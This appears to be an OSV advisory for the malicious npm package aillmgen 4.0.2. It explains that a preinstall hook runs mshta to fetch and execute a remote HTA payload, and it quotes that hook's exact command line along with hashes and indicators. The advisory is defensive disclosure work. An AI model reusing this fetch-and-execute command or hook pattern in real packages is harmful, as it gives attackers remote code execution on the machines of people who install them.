MAL-2026-5927

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/aillmgen/MAL-2026-5927.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5927

Published

2026-06-16T22:09:54Z

Modified

2026-06-16T22:31:49.121604172Z

Summary

Malicious code in aillmgen (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341)

On npm install, the package's preinstall hook (preinstall.js) runs exec('cmd /c "mshta http://fixars.top"'), invoking the Windows mshta.exe binary to fetch and execute an HTA payload from http://fixars.top with the installer's privileges. mshta is a well-known living-off-the-land binary that executes arbitrary HTA/JScript/VBScript content directly from a remote URL, giving the operator of fixars.top remote code execution on any Windows machine that installs this package. The remote endpoint is plain HTTP and attacker-mutable, and the behavior is unrelated to the package's stated LLM-client purpose (the library code references an EasyLLMClient targeting api.easyllm.ai while the package itself is published under the unrelated name aillmgen with empty author and description metadata). The combination of install-time RCE, plaintext attacker-controlled fetch-and-execute, impersonation of an LLM-client utility, and placeholder publisher metadata is a supply-chain dropper.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006837",
            "import_time": "2026-06-16T22:17:36.229900342Z",
            "source": "amazon-inspector",
            "versions": [
                "4.0.2"
            ],
            "sha256": "5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341",
            "modified_time": "2026-06-16T22:09:54Z"
        }
    ]
}

References

https://www.npmjs.com/package/aillmgen/v/4.0.2

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / aillmgen

Package

Name: aillmgen; View open source insights on deps.dev
Purl: pkg:npm/aillmgen

Affected ranges

Affected versions

4.*

4.0.2

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/aillmgen/MAL-2026-5927.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

indicators

{
    "package_integrity": [
        {
            "filename": "aillmgen-4.0.2.tgz",
            "hashes": {
                "sha1": "e558ff2c70c4434472e0f213073faf72c1accd8e",
                "sha512_sri": "sha512-/xoVe3G6bgDxVKZL0AzmWznijt4WejB7NioxzFLzY/toq/W7HnkE7/QljuglUa2M1nPu9RawnDh7ceULiijFnA=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "preinstall.js",
            "sha256": "6531737cdf18669d076b7ff3bf8168ddc74828f385a4a037a47bd8767d11b889",
            "tlsh": "70b012d499453234b252a0e02c3060225807c441225055e0648c451d441741516235fd"
        },
        {
            "path": "package.json",
            "sha256": "8c76bc8aabe8bdbe6f4056c99588096e8cdf7a3d8b15cdbc0beb4d136f057966",
            "tlsh": "2ed02e388da3e93328c006620c2a9056b2e08f0f04143c0da3cf192c469e673b8ff31e"
        }
    ]
}